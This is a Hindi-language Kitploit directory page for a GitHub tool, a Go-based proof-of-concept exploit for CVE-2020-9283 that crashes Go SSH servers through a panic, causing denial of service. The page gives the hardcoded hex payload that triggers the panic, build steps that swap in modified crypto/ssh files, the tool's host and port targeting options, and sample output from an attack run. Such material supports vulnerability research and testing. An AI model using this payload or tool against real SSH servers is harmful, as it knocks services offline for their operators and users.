Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-9283 — CVE-2020-9283 के लिए Go-आधारित एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/brompwnie/cve-2020-9283
भेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbrompwnie/cve-2020-9283

CVE-2020-9283

CVE-2020-9283 के लिए Go-आधारित एक्सप्लॉइट

रिपॉजिटरी देखें
51116 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-9283 के लिए एक्सप्लॉइट

यह प्रोजेक्ट github.com/mark-adams/exploits/CVE-2020-9283 पर पाए जाने वाले मूल POC से प्रेरित है। मैं उत्सुक था कि Go SSH लाइब्रेरी कैसे लागू की गई है, इसलिए मैंने go का उपयोग करके PoC को लागू करने का निर्णय लिया।

एक छोटा लेख यहाँ पाया जा सकता है https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

यह क्या करता है?

यह Go-आधारित SSH सर्वर पर panic उत्पन्न करता है जिससे DoS हो सकता है।

स्थापना

मैंने Release अनुभाग में बाइनरी जारी किए हैं, हालांकि आप संलग्न स्रोत कोड का उपयोग करके अपना खुद का पुनर्निर्माण कर सकते हैं।

स्रोतों का निर्माण

मैंने इसे समझने के लिए सीधे अपने सिस्टम पर Go क्रिप्टो लाइब्रेरी को संशोधित करने का निर्णय लिया, यह आदर्श नहीं है और शायद ऐसा करने का सबसे अच्छा तरीका नहीं है, लेकिन यह काम करता है ;) यदि आप GO मॉड्यूल का उपयोग करके पुनर्निर्माण करना चाहते हैं, तो अपने स्थानीय सिस्टम पर Crypto/ssh फाइलों client_auth.go, handshake.go, transport.go की सामग्री को यहाँ स्थित ".bak" फ़ाइलों से बदलें। ये संशोधित फाइलें वर्बोज़ डिबगिंग आउटपुट और "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" का एक हार्डकोडेड पेलोड रखती हैं जो panic को ट्रिगर करता है।

उपयोग

आप बहुत सारा डिबगिंग आउटपुट और "errors" देखेंगे, यह अपेक्षित है। यदि आपका लक्ष्य panic कर चुका है, तो आपको "bad key lengths" से संबंधित त्रुटियाँ दिखनी चाहिए। यदि आप इसे स्थानीय रूप से परीक्षण करना चाहते हैं, तो यहाँ पाए जाने वाले कमजोर कोड का उपयोग करें github.com/mark-adams/exploits/CVE-2020-9283

root@kitploit:~
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
./CVE-2020-9283 -port=2022
+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

टूल डाउनलोड करें